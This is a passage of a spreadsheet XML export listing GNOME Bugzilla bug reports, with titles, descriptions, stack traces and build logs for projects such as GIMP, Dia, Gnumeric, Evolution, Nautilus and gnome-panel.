Fu&gt;Buttons&gt;Round button. With the 2.2.2 GLib I can't get it to hang.
Will have to go through the change closely and see if I can find part of 
it causes this. (And then check using GNet's example programs whether they 
still work if it that part is backed out.) If it's impossible to fix te 
bug I guess the change will have to be reverted completely as GIMP is a 
pretty important user of GLib. (Andrew can distribute a separately built 
glib that includes his changes for GNet users.)</t>
  </si>
  <si>
    <t>GNOME-VFS-396713</t>
  </si>
  <si>
    <t>Port tests/test-shell.c to GOption</t>
  </si>
  <si>
    <t>test-shell.c uses popt (nothing else in gnome-vfs seems to). It would be nice to completely remove the dependency (which doesn't seem to be check for in configure.in)</t>
  </si>
  <si>
    <t>GIMP-140649</t>
  </si>
  <si>
    <t>rectangular selection outside guides</t>
  </si>
  <si>
    <t>when you create 4 guides and want to create rectangular selection inside guides
(slides?) right border is 2 px outside guide and bottom 1 px outside. You have
to use bigger zoom to stick selection properly</t>
  </si>
  <si>
    <t>frolow</t>
  </si>
  <si>
    <t>DIA-136061</t>
  </si>
  <si>
    <t>install fails with new broken file .xpms</t>
  </si>
  <si>
    <t>dia from CVS HEAD fails at the install stage when trying to install new
.xpm files.
the directory 'share/dia/images/pixmaps' is not created because the
variable 'imagedir' in dia/lib/Makefile.am is set to
$(pkgdatadir)/images. With the xpms located where they are they are
prefixed with the 'pixmap' directory and therefore cannot be copied to a
non-existent directory. Setting imagedir to '$(pkgdatadir)/images/pixmaps'
obviously means 'share/dia/images/pixmaps/pixmaps' is wrongly referenced.
In order to install properly I have to add a 'mkdir' command to autogen.sh
to create the directory prior to the install stage.
/bin/bash ../mkinstalldirs /opt/gnome-2.5/share/dia/images
 /usr/bin/install -c -m 644 ./pixmaps/broken-chain.xpm
/opt/gnome-2.5/share/dia/images/pixmaps/broken-chain.xpm
/usr/bin/install: cannot create regular file
`/opt/gnome-2.5/share/dia/images/pixmaps/broken-chain.xpm': No such file or
directory
 /usr/bin/install -c -m 644 ./pixmaps/unbroken-chain.xpm
/opt/gnome-2.5/share/dia/images/pixmaps/unbroken-chain.xpm
/usr/bin/install: cannot create regular file
`/opt/gnome-2.5/share/dia/images/pixmaps/unbroken-chain.xpm': No such file
or directory
make[2]: *** [install-imageDATA] Error 1
make[2]: Leaving directory `/gnome/2.4/nightly/src-2.5-20040303/dia/lib'
make[1]: *** [install-am] Error 2
make[1]: Leaving directory `/gnome/2.4/nightly/src-2.5-20040303/dia/lib'
make: *** [install-recursive] Error 1</t>
  </si>
  <si>
    <t>PAN-102881</t>
  </si>
  <si>
    <t>URLs with commas not parsed completely</t>
  </si>
  <si>
    <t>URLs in the message body are automagically turned into clickable 
hyperlinks. It seems the URL parser reproducibly stops at the first comma 
it finds although this is a valid character in hyperlinks so any link 
into e.g. time.com will be cut off right before the first comma.</t>
  </si>
  <si>
    <t>GNUMERIC-345878</t>
  </si>
  <si>
    <t>Gnumeric crashes while adding objects (Legend Axis etc) to chart.</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Insert new chart
2. Press add Legend Axis anything
3. Crash
Stack trace:
#0  0xb7ad4a29 in go_geometry_test_OBR_overlap ()
   from /usr/lib/libgoffice-1.so.2
#1  0xb7b3b756 in axis_line_render () from /usr/lib/libgoffice-1.so.2
#2  0xb7b3e063 in xy_process () from /usr/lib/libgoffice-1.so.2
#3  0xb7b3e388 in gog_axis_base_view_render () from /usr/lib/libgoffice-1.so.2
#4  0xb7b37e8a in gog_axis_view_render () from /usr/lib/libgoffice-1.so.2
#5  0xb7b2efed in gog_view_render () from /usr/lib/libgoffice-1.so.2
#6  0xb7b33c48 in gog_chart_view_render () from /usr/lib/libgoffice-1.so.2
#7  0xb7b2efed in gog_view_render () from /usr/lib/libgoffice-1.so.2
#8  0xb7b2f05e in gog_view_render_real () from /usr/lib/libgoffice-1.so.2
#9  0xb7b2ddec in gog_outlined_view_render () from /usr/lib/libgoffice-1.so.2
#10 0xb7b2efc5 in gog_view_render () from /usr/lib/libgoffice-1.so.2
#11 0xb7b5a545 in gog_renderer_pixbuf_update () from /usr/lib/libgoffice-1.so.2
#12 0xb7b5d0ab in gog_control_foocanvas_update ()
   from /usr/lib/libgoffice-1.so.2
#13 0xb7b26800 in foo_canvas_group_update () from /usr/lib/libgoffice-1.so.2
#14 0xb7b26a29 in foo_canvas_expose () from /usr/lib/libgoffice-1.so.2
#15 0xb7825fcd in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#16 0xb75a6dc9 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#17 0xb75a7489 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#18 0xb75b98ae in signal_emit_unlocked_R () from /usr/lib/libgobject-2.0.so.0
---Type  to continue or q  to quit---
#19 0xb75baaec in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#20 0xb75bb109 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#21 0xb78d463c in gtk_widget_event_internal ()
   from /usr/lib/libgtk-x11-2.0.so.0
#22 0xb7824eff in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#23 0xb76fe46d in gdk_window_process_updates_internal ()
   from /usr/lib/libgdk-x11-2.0.so.0
#24 0xb76fe50f in gdk_window_process_all_updates ()
   from /usr/lib/libgdk-x11-2.0.so.0
#25 0xb78e0da6 in gtk_window_check_resize () from /usr/lib/libgtk-x11-2.0.so.0
#26 0xb75b5c6b in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#27 0xb75a6dc9 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#28 0xb75a7489 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#29 0xb75b98ae in signal_emit_unlocked_R () from /usr/lib/libgobject-2.0.so.0
#30 0xb75badc0 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#31 0xb75bb109 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#32 0xb77bd371 in gtk_container_check_resize ()
   from /usr/lib/libgtk-x11-2.0.so.0
#33 0xb77bd3bc in gtk_container_idle_sizer () from /usr/lib/libgtk-x11-2.0.so.0
#34 0xb752d681 in g_idle_dispatch () from /usr/lib/libglib-2.0.so.0
#35 0xb7531660 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
---Type  to continue or q  to quit---
#36 0xb7531e0b in g_main_context_iterate () from /usr/lib/libglib-2.0.so.0
#37 0xb7532177 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#38 0xb75fbce3 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#39 0x0804bfc2 in main ()
(gdb) 
Other information:</t>
  </si>
  <si>
    <t>q</t>
  </si>
  <si>
    <t>EVOLUTION-323909</t>
  </si>
  <si>
    <t>Post new Message to Folder accelerator borked</t>
  </si>
  <si>
    <t>Ctrl-Alt accelerators are commonly used for window manager. Evo should not use them.
Message / Post new Message to Folder</t>
  </si>
  <si>
    <t>GNOPERNICUS-112458</t>
  </si>
  <si>
    <t>srcore</t>
  </si>
  <si>
    <t>Gnopernicus does not read labels for groups of radio buttons in its own dialog boxes</t>
  </si>
  <si>
    <t>When a radio button in a group of radio buttons receives focus only the 
radio button's name is spoken-- which gives the blind user no context 
about the meaning of the group of radio buttons to which the current one.
To Reproduce:
1. Select General settings from Gnopernicus's main dialog
2. Select Speech settings from the general settings dialog
3. Tab to the punctuation group box-- only the name of the radio button 
(in my case same) is spoken.
What should happen-- both the name of the group box punctuation and the 
name of the radio button same should be spoken and displayed in Braille.
belongs.</t>
  </si>
  <si>
    <t>marc.mulcahy</t>
  </si>
  <si>
    <t>FILE-ROLLER-315069</t>
  </si>
  <si>
    <t>file-roller: drag 'n drop doesn't work for more than 1 file.</t>
  </si>
  <si>
    <t>This bug has been opened here: 
I'm using breezy and file-roller v2.11.92-0ubuntu1.
When I open an archive and try to drag 'n drop 1 file to nautilus it works. But
When I try to drag 'n drop more than 1 file it doesn't work at all (the cursor
doesn't even change to the drag 'n drop one).
I didn't have this problem in hoary (even if in hoary the drag 'n drop was
tricky : it didn't always work (bug #6845)).</t>
  </si>
  <si>
    <t>GIMP-530519</t>
  </si>
  <si>
    <t>Fixed option in the Rectangle Select Tool uses wrong value</t>
  </si>
  <si>
    <t>If you:
1) select an arbitrary area using the cursor with the Rectangle Select Tool
2) specify exact size dimensions for width and height in the main GIMP window
3) check the Fixed option checkbox for Aspect Ratio
Try adjusting the size of the select area using one of the selection's corners.  It will adhere to the aspect ratio of the full image NOT the aspect ratio that the selected area had.  However if you reposition the selected area using the cursor (click and drag&amp;drop it somewhere) between steps 2 and 3 it will adhere to the aspect ratio of the specified dimensions of the selected area.
I don't think that you should have to perform the explained procudure between steps 2 and 3 to get the Rectangle Select Tool to read the aspect ratio from its specified dimensions.  If this was an intended design could someone please explain it?
Thank you.
Other information:</t>
  </si>
  <si>
    <t>rrf5000</t>
  </si>
  <si>
    <t>GLIB-75572</t>
  </si>
  <si>
    <t>'configure' fails to override the path to pkg-config</t>
  </si>
  <si>
    <t>I tried to override the path to pkg-config with the env. var. PKG_CONFIG.
But the 'configure' script didn't work as expected.
Patch:
--- configure.in.orig   Wed Mar 20 11:55:32 2002
+++ configure.in        Wed Mar 20 11:55:50 2002
@@ -2067 +2067 @@
   AC_MSG_ERROR([*** pkg-config not found. See
http://www.freedesktop.org/software/pkgconfig/])
 fi
-if pkg-config --atleast-pkgconfig-version 0.5  then
+if $PKG_CONFIG --atleast-pkgconfig-version 0.5  then
   :
 else
   AC_MSG_ERROR([*** pkg-config too old version 0.5 or better required.])
Background:  I don't have root access to this SuSE7.2 system which has
no pkg-config.  So I had to install pkg-config from source to some
non-standard locations.  glib-2.0.0 failed to 'configure' because of that
even though I set the env. var. PKG_CONFIG to point to my pkg-config
executable.  The above patch fixed the problem in my situation.</t>
  </si>
  <si>
    <t>leesaudan</t>
  </si>
  <si>
    <t>GNOME-THEMES-140721</t>
  </si>
  <si>
    <t>theme-mist</t>
  </si>
  <si>
    <t>non-free material in SVG icon from flat-blue icon theme</t>
  </si>
  <si>
    <t>icon-themes/Flat-Blue/scalable/emblems/emblem-new.svg contains a glyph from the
TrebuchetMS-Bold font which is AFAIK not free.</t>
  </si>
  <si>
    <t>campd</t>
  </si>
  <si>
    <t>EVOLUTION-203586</t>
  </si>
  <si>
    <t>We need a start-up druid</t>
  </si>
  <si>
    <t>There is no first-time-user startup wizard.  The first time that I
  run Evolution I do expect to go through a brief configuration
  process to setup my email address or Exchange server or whatever.
  I think that this should be gotten out of the way the first time the
  user runs the application instead of doing it piecemeal later on.
  The importing dialog should also be incorporated into the
  first-time-user wizard which shouldn't appear till the splash
  screen is gone (and maybe the main application wizard has appeared).</t>
  </si>
  <si>
    <t>EVOLUTION-335241</t>
  </si>
  <si>
    <t>[KB-Fixed] Send/Receive Messages window too big</t>
  </si>
  <si>
    <t>When having more than 12 email accounts the send/receive messages window gets
too big. On a 1024x768 gets out of screen. Maybe a lower font solve this ?
Other information:</t>
  </si>
  <si>
    <t>seti</t>
  </si>
  <si>
    <t>GTK+-64467</t>
  </si>
  <si>
    <t>misprintin docs for gtk_notebook_prepend_page ()</t>
  </si>
  <si>
    <t>Documantation for gtk_notebook_prepend_page () says:
Prepends a page to noteobook.
'noteobook' should be 'notebook'.</t>
  </si>
  <si>
    <t>NAUTILUS-47610</t>
  </si>
  <si>
    <t>rpm spec file and configure.in has too lenient dependencies</t>
  </si>
  <si>
    <t xml:space="preserve">Pr my mail :
Oy...
I was just looking through the output from
http://stage-services/catalog/find?name=nautilus
to see what packages and what version nautilus depends on these days
(since that
is what can block PR3 users from upgrading)
I noted some diffs
the rpm depends on....
.. gnome-vfs &gt;= 0.4.2 but the 1.0 branch builds against 0.6.2.0
.. bonobo &gt;= 0.33 but the 1.0 branch builds against 0.37
.. ORBit &gt;= 0.5.6 but the 1.0 branch builds against 0.5.7
.. GConf &gt;= 0.12 but the 1.0 branch builds against 0.50
.. medusa &gt;= 0.2.2 but the 1.0 branch builds against 0.3.3
.. control-center &gt;= 1.2.3 but the 1.0 branch builds against 1.2.4
.. oaf &gt;= 0.6.2 but the 1.0 branch builds against 0.6.5
Some of these seem to be pretty out of date (GConf gnome-vfs
and bonobo also sets of huge friggin warning lights).
If the rpm does not require these we should retroactively staring
two weeks ago use the packages that will at least be in the 1.4
release to ensure that the rpm won't go live on monday and by
tuesday bugzilla.gnome.org silently bursts into flames and
management into tears.
/dev/eskil
---
------- Additional Comments From eskil@eskil.dk 2001-03-09 00:05:22 ----
So I also tested installing PR3 on a fresh RH62 and then upgrading to 1.0.
The upgrade did _not_ upgrade medusa GConf oaf ORBit ammonite bonobo and
possibly others. So this smells like a 1.0 blocker. Note it will not only cause
the installer to not update this stuff using $ rpm -Uhv nautilus-foo.rpm will
also say yeah all is fine continue have fun...
Luckily this is really a minor fix and thanks to eric recent upgrade of the
configure.in script it's really simple now. I just want to find out which
packages we rely on the gnome 1.4 version and which we package ourselves.
Luc
------- Additional Comments From don@eazel.com 2001-03-09 00:13:56 ----
This is a 1.0 blocker because we need to decide what to do here that very
likely being a change in the spec files.
Robin if changes are needed who can help you with this?
------- Additional Comments From eskil@eskil.dk 2001-03-09 00:27:07 ----
it's basically just changing the *_REQUIRED=x.y.z in configure.in the changes
will then propagate into the specfile so any hacker who wants to monitor
tinderbox afterwards can do it (it's really a simple 1 minute job (25 including
vomitting to cvs.gnome.org)).
The question is just which of these packages do we not plan on building but
rather use GNOME 1.4 package and for these what is the requirement and is that
version high enough for nautilus to work (and this is a bit more than 5 minutes
and not something that robin or I can do most like mjs since he's the release
coordinator).
------- Additional Comments From eli@eazel.com 2001-03-09 11:01:39 ----
Eskil Robin &amp; I already discussed this last night --- never filed a bug --- and
I'm pretty sure he fixed before this bug was even filed.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:13 -------
The original owner (rslomkow@eazel.com) of this bug does not have an account here.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>eskil</t>
  </si>
  <si>
    <t>GNOME-MEDIA-519544</t>
  </si>
  <si>
    <t>gnome-volume-control</t>
  </si>
  <si>
    <t>don't access GstMixerOptions-&gt;values list directly</t>
  </si>
  <si>
    <t>Attached patch makes gnome-volume-control use gst_mixer_options_get_values() instead of accessing the values field in the GstMixerOptions structure directly.
This is needed for future use cases where the list of options can change in which case options-&gt;value or its content has to change and it's easiest to ensure that this is done in a safe way if apps only use _get_values() and not access the structure member directly.</t>
  </si>
  <si>
    <t>LIBWNCK-124148</t>
  </si>
  <si>
    <t>minimize animation goes to wrong place with grouped windows</t>
  </si>
  <si>
    <t>If you turn on grouping in the window list then when you minimize a
window from a group the animation goes to the edge of the window list
rather than going to the group.
This may actually be a libwnck or metacity bug.</t>
  </si>
  <si>
    <t>ADWAITA-ICON-THEME-462079</t>
  </si>
  <si>
    <t>gnome-icon-theme fails to build</t>
  </si>
  <si>
    <t>The new help-contents.png icon is missing from the 24x24 directory even though it is included in the Makefile.am</t>
  </si>
  <si>
    <t>GDM-359873</t>
  </si>
  <si>
    <t>timed login displays username after the login counter text</t>
  </si>
  <si>
    <t>That bug has been opened on https://launchpad.net/distros/ubuntu/+source/gdm/+bug/61752
Edgy 6.10 dev (sep 22 3 AM IST) with updates
Steps to reproduce
-&gt; Enable timed login for a user
-&gt; Logout
Message shown below the Username box is :
 will login in  seconds
eg: pradeep will login in 5 secondspradeep
...
&gt; Thanks for your bug. What locale do you use?
...
I use english its en_US.UTF-8.
...
Same here with french locale.
...
sv_SE also
the msgid in the .po generated from Rosetta (for edgy) shows the correct line.</t>
  </si>
  <si>
    <t>GNOME-PANEL-163996</t>
  </si>
  <si>
    <t>Places not happy with spaces in names</t>
  </si>
  <si>
    <t>- add a dirname with a space to the gtk bookmarks
- the dir is listed in Places
- click on it
=&gt; Cannot display location 'file:///tmp/one%2520bug'
Details: There is no default action associated with this location.</t>
  </si>
  <si>
    <t>PAN-86215</t>
  </si>
  <si>
    <t>Pan crashes when editing filters</t>
  </si>
  <si>
    <t>Go to Rules pick a rule and edit it.
Go to Filters tab edit filters.
(To ensure a crash work on several different filters or set up many 
conditions in one filter.)
Ok the conditions press Ok on the Filters dialog.
Pan segfaults at this point.</t>
  </si>
  <si>
    <t>EPIPHANY-326807</t>
  </si>
  <si>
    <t>missing dbus-session prevents startup</t>
  </si>
  <si>
    <t>This could be related to recent change in gnome-session (make app crash on g_critical). I found a similar behavior on rhythmbox (see http://mail.gnome.org/archives/rhythmbox-devel/2006-January/msg00032.html )
The console output is 
** (epiphany:12012): WARNING **: Failed to find epiphany-close-tab.png
(epiphany:12012): Gtk-WARNING **: Useless empty GtkIconSource
** (epiphany:12012): WARNING **: Unable to connect to session bus: Failed to connect to socket /tmp/dbus-YlDNTsI0hr: Connessione rifiutata
** (epiphany:12012): WARNING **: Unable to get proxy for DBus's s bus.
** (epiphany:12012): WARNING **: Unable to get DBus proxy aborting activation.
Oh of course the dbus-session was not running when I started ephy :-)  but I suppose that by now application should start even the message bus is not available</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-58417</t>
  </si>
  <si>
    <t>System settings application crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package: control-center
Severity: normal
Version: 1.4.0.1
Synopsis: System settings application crash
Bugzilla-Product: control-center
Bugzilla-Component: general
Description:
Hello!
I'm just try to run System-&gt;Settings app (five minutes after install).
Before that I has manual compiled Gnome.
good luck and thank yours for your work!
Alexey.
Debugging Information:
(no debugging symbols found)...0x4056e5a9 in __wait4 () from /lib/libc.so.6
#0  0x4056e5a9 in __wait4 () from /lib/libc.so.6
#1  0x405d8824 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4015e2a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
#3  
#4  chunk_free (ar_ptr=0xfffcb0b5 p=0x405d6ce8) at malloc.c:3069
#5  0x40534334 in __libc_free (mem=0x405d6cf0) at malloc.c:3043
#6  0x400991f1 in g_free (mem=0x405d6cf0) at gmem.c:411
#7  0x4046fcbc in free_sections (p=0x80af3b8) at gnome-config.c:156
#8  0x4046fd1a in free_profile (p=0x80a8220) at gnome-config.c:170
#9  0x4046fd11 in free_profile (p=0x813bd48) at gnome-config.c:169
#10 0x4046fd11 in free_profile (p=0x8150aa8) at gnome-config.c:169
#11 0x40471633 in gnome_config_drop_all () at gnome-config.c:1321
#12 0x40470d4a in gnome_config_sync () at gnome-config.c:789
#13 0x4011210a in write_layout_config (app=0x807c960 layout=0x813bee8)
    at gnome-app.c:67
#14 0x401124e6 in layout_changed (w=0x8080aa0 data=0x807c960)
    at gnome-app.c:184
#15 0x402a2a03 in gtk_marshal_NONE__NONE (object=0x8080aa0 
    func=0x401123ec  func_data=0x807c960 args=0xbffff330)
    at gtkmarshal.c:312
#16 0x402d20d6 in gtk_handlers_run (handlers=0x8061d90 signal=0xbffff2d0 
    object=0x8080aa0 params=0xbffff330 after=0) at gtksignal.c:1917
#17 0x402d1537 in gtk_signal_real_emit (object=0x8080aa0 signal_id=67 
    params=0xbffff330) at gtksignal.c:1477
#18 0x402cf5ac in gtk_signal_emit (object=0x8080aa0 signal_id=67)
    at gtksignal.c:552
#19 0x4013dc50 in gnome_dock_add_item (dock=0x8080aa0 item=0x8081860 
    placement=GNOME_DOCK_TOP band_num=0 position=0 offset=0 in_new_band=1)
    at gnome-dock.c:1440
#20 0x40143af2 in gnome_dock_layout_add_to_dock (layout=0x8080b70 
    dock=0x8080aa0) at gnome-dock-layout.c:430
#21 0x4013e1eb in gnome_dock_add_from_layout (dock=0x8080aa0 layout=0x8080b70)
    at gnome-dock.c:1693
#22 0x40112340 in gnome_app_show (widget=0x807c960) at gnome-app.c:153
#23 0x402a2a03 in gtk_marshal_NONE__NONE (object=0x807c960 
    func=0x401122bc  func_data=0x0 args=0xbffff740)
    at gtkmarshal.c:312
#24 0x402d13e3 in gtk_signal_real_emit (object=0x807c960 signal_id=8 
    params=0xbffff740) at gtksignal.c:1440
#25 0x402cf5ac in gtk_signal_emit (object=0x807c960 signal_id=8)
    at gtksignal.c:552
#26 0x403032c4 in gtk_widget_show (widget=0x807c960) at gtkwidget.c:1434
#27 0x4026262b in gtk_container_show_all (widget=0x807c960)
    at gtkcontainer.c:1876
#28 0x40303955 in gtk_widget_show_all (widget=0x807c960) at gtkwidget.c:1560
#29 0x804da79 in create_exit_dialog ()
#30 0x804db1c in main ()
#31 0x404d4b65 in __libc_start_main (main=0x804dad8  argc=1 
    ubp_av=0xbffffaf4 init=0x804c108  fini=0x8051d4c  
    rtld_fini=0x4000df24  stack_end=0xbffffaec)
    at ../sysdeps/generic/libc-start.c:111
#0  0x4056e5a9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405d8824 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4015e2a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 1078514968
in_segv = 1
pid = 0
#3  
No locals.
#4  chunk_free (ar_ptr=0xfffcb0b5 p=0x405d6ce8) at malloc.c:3069
hd = 4294966784
sz = 1079864544
idx = 1079864552
next = 0x80bad9c8
nextsz = 1079864552
prevsz = 4294966784
bck = 0x405d6d20
fwd = 0x0
islr = 0
heap = (heap_info *) 0xbfffef90
hd = 4294966784
sz = 1079864544
idx = 1079864552
next = 0x80bad9c8
nextsz = 1079864552
prevsz = 4294966784
bck = 0x405d6d20
fwd = 0x0
islr = 0
heap = (heap_info *) 0xbfffef90
heap = (heap_info *) 0xbfffef90
#5  0x40534334 in __libc_free (mem=0x405d6cf0) at malloc.c:3043
3043	in malloc.c
mem = (void *) 0x0
ar_ptr = (arena *) 0xfffcb0b5
p = 0x405d6ce8
ar_ptr = (arena *) 0xfffcb0b5
p = 0x405d6ce8
#6  0x400991f1 in g_free (mem=0x405d6cf0) at gmem.c:411
mem = 0xfffffe00
#7  0x4046fcbc in free_sections (p=0x80af3b8) at gnome-config.c:156
p = (TSecHeader *) 0x80af3b8
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-08-01 17:55 -------
The original reporter (alex@ea.ru) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>VALA-540662</t>
  </si>
  <si>
    <t>MemoryInputStream.from_data() and add_data() should allow null DestroyNotify</t>
  </si>
  <si>
    <t>The DestroyNotify arguments to MemoryInputStream.from_data() and add_data() should allow nulls:
/* 
 * valac --pkg gio-2.0 test.vala
 */
using GLib
public class Test : GLib.Object {
	public static void main(string[] args) {
		// Should allow null DestroyNotify
		MemoryInputStream input = new MemoryInputStream.from_data (test 4 null)
	}
}</t>
  </si>
  <si>
    <t>vala-maint</t>
  </si>
  <si>
    <t>SEAHORSE-107408</t>
  </si>
  <si>
    <t>change passphrase confusing uses default passphrase dialog</t>
  </si>
  <si>
    <t>Changing the passphrase should really be done in one dialog where the user
could enter the passphrase twice for confirmation.  This would require
temporarily changing the gpgme passphrase callback during the change
passphrase operation.  GPA already does this shouldn't be too hard.</t>
  </si>
  <si>
    <t>BEAGLE-337975</t>
  </si>
  <si>
    <t>Add /usr locations for gnome and kde crawl rules</t>
  </si>
  <si>
    <t>Please describe the problem:
The crawl-rules only search for gnome and kde information (applications 
documentation) in /opt locations. Some distros put into /usr. Specifically 
Gentoo puts into /usr/kde/${version}. Since adding non-existance directories to 
the crawl rules does not cause problems I request that these be added.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GLIB-OPENSSL-777314</t>
  </si>
  <si>
    <t>GLIB-OPENSSL</t>
  </si>
  <si>
    <t>BIO methods return 1 for success but they're checked against 0</t>
  </si>
  <si>
    <t>Created attachment 343537
Patch for the issue
BIO_meth_* functions return 1 on success however they're checked against 0 causing BIO_g_tls() to return NULL which is unchecked by the caller resulting in a null pointer access and consequently crash.
The simple patch I've attached fixes this problem by simply inverting the condition. Tested on Linux only but I don't see why it shouldn't work on other systems as well.
Originally posted on GitHub: https://github.com/GNOME/glib-openssl/pull/2</t>
  </si>
  <si>
    <t>glib-openssl-maint</t>
  </si>
  <si>
    <t>daniele.athome</t>
  </si>
  <si>
    <t>GEDIT-319950</t>
  </si>
  <si>
    <t>Functionality issues in printing dialog in gedit</t>
  </si>
  <si>
    <t>1) Open Gedit.
2) Select File/Print.
3) Click on Job tab.
4) Checks Lines.
5) select a number (e.g. 5) in From and lower number (e.g. 3) in To.
6) Click on Print preview.
Observation and Bug: The print preview has line 4 i.e. excludes the line 5 and 3
This incorrect behaviour should result in the error message. Currently dialog
just silently accepts it.</t>
  </si>
  <si>
    <t>raghu.sarangapani</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-354726</t>
  </si>
  <si>
    <t>gnome-power-manager lid close default</t>
  </si>
  <si>
    <t>By default /apps/gnome-power-manager/action_ac_button_lid is set to default. So when the lid is closed the screen goes off but the backlight stays on. This should be set to blank at least as  no one wants their backlight using power or melting their keyboard (Macbook melted keyboards anyone )).</t>
  </si>
  <si>
    <t>GNOME-APPLETS-134929</t>
  </si>
  <si>
    <t>screen reader reads twice  automatically update every  widget.</t>
  </si>
  <si>
    <t>In wether forecast preference window &gt; general page tab &gt; move the focus 
on to automatically update widget. 
Case 1: 
Screen reader  do not reads   The minutes along with â€œ automatically  
update every â€œ  widget accessible description.
Case 2:
Move focus on to minutes widget. Screen reader reads the minutes twice.
Case 3:
Similarly  in address text entry box  screen reader reads it twice as  â€œ 
address colon â€œ
Expected:
1.	It is good  that minutes also  read with the main widget.  i.e â€œ 
automatically update every â€œ 1o0 minutes.
2.	screen  reader should not read  twice.</t>
  </si>
  <si>
    <t>EVOLUTION-257822</t>
  </si>
  <si>
    <t>save-as oddness ...</t>
  </si>
  <si>
    <t>On an attachment -&gt; right click -&gt; save as /tmp/Foo
Repeat get a strange dialog:
Internal error unknown error 'mail:ask-save-path-overwrite' requested.
evolution-data-server-0.0.92.1.0.200404282001-0.snap.ximian.9.1
evolution1.5-devel-1.5.7.0.200404282001-0.snap.ximian.9.1
evolution-data-server-devel-0.0.92.1.0.200404282001-0.snap.ximian.9.1
evolution1.5-1.5.7.0.200404282001-0.snap.ximian.9.1
In case it makes a difference this is a tar.gz with the extension '.zip' -)</t>
  </si>
  <si>
    <t>BONOBO-65899</t>
  </si>
  <si>
    <t>bonobo-property-control.c is not included in 2.0 build</t>
  </si>
  <si>
    <t>bonobo-property-control.c is not included in 2.0 build (it is absent in
Makefile.am) I am not sure it is really needed but
1) it is required for gnome-control-center at least for CVS version2)
bonobo-property-control.h IS included in build and is installed
The patch fixing the problem attached.
It also fixes bonobo-property-contol.c - old (ORBit 1.0?) constant was used
there. Guess was not converted.</t>
  </si>
  <si>
    <t>denm</t>
  </si>
  <si>
    <t>EKIGA-326506</t>
  </si>
  <si>
    <t>Critical error in notification zone</t>
  </si>
  <si>
    <t>Right-click the GM icon select Connection
in the terminal I have this error
** (gnomemeeting:14639): CRITICAL **: void connect_cb(GtkWidget* void*): assertion `data != NULL' failed
GnomeMeeting 1.9.0-20060108
Dapper</t>
  </si>
  <si>
    <t>GNOME-PANEL-73597</t>
  </si>
  <si>
    <t>gnome-panel crashes when adding a drawer</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-panel
Severity: major
Version: 1.5.11
Synopsis: gnome-panel crashes when adding a drawer
Bugzilla-Product: gnome-panel
Bugzilla-Component: clock applet
BugBuddy-GnomeVersion: 2.0 (1.112.0)
Description:
Description of Problem:
Gnome-panel crashes when adding a drawer. If it is configured so that a
drawer is automatically added upon launch it crashes immediately after
launch.
Steps to reproduce the problem:
1. right click
2. add to panel
3. drawer
Actual Results:
crash
Expected Results:
How often does this happen?
always
Additional Information:
Debugging Information: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ew Thread 1024 (LWP 368)]
(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0x4095db79 in wait4 () from
/lib/libc.so.6
#0  0x4095db79 in wait4 () from /lib/libc.so.6
#1  0x409d6068 in __check_rhosts_file () from /lib/libc.so.6
#2  0x4080b263 in waitpid () from /lib/libpthread.so.0
#3  0x400b58a3 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x40808d94 in pthread_sighandler () from /lib/libpthread.so.0
#5  0x408e6928 in sigaction () from /lib/libc.so.6
#6  0x407cbb6a in ORBit_marshal_value () from /usr/lib/libORBit-2.so.0
#7  0x407cbaf6 in ORBit_marshal_value () from /usr/lib/libORBit-2.so.0
#8  0x407c5ad6 in ORBit_small_freekids () from /usr/lib/libORBit-2.so.0
#9  0x407c6055 in ORBit_small_invoke_stub () from
/usr/lib/libORBit-2.so.0
#10 0x402fc9b6 in ConfigDatabase_set () from /usr/lib/libgconf-2.so.4
#11 0x402f4b51 in gconf_engine_set () from /usr/lib/libgconf-2.so.4
#12 0x402f6b22 in gconf_engine_get_pair () from
/usr/lib/libgconf-2.so.4
#13 0x402f8fd9 in gconf_client_set_string () from
/usr/lib/libgconf-2.so.4
#14 0x08077073 in drawer_save_to_gconf ()
#15 0x08074f80 in panel_applet_save_to_gconf ()
#16 0x0807534d in panel_applet_register ()
#17 0x08076d72 in load_drawer_applet ()
#18 0x08077200 in drawer_load_from_gconf ()
#19 0x08074c23 in panel_applet_create_menu ()
#20 0x08074cf5 in panel_applet_create_menu ()
#21 0x08074d36 in panel_applet_load_applets_from_gconf ()
#22 0x08067a92 in session_load ()
#23 0x0805aa49 in main ()
#24 0x408d66cf in __libc_start_main () from /lib/libc.so.6
Thread 1 (Thread 1024 (LWP 368)):
#0  0x4095db79 in wait4 () from /lib/libc.so.6
#1  0x409d6068 in __check_rhosts_file () from /lib/libc.so.6
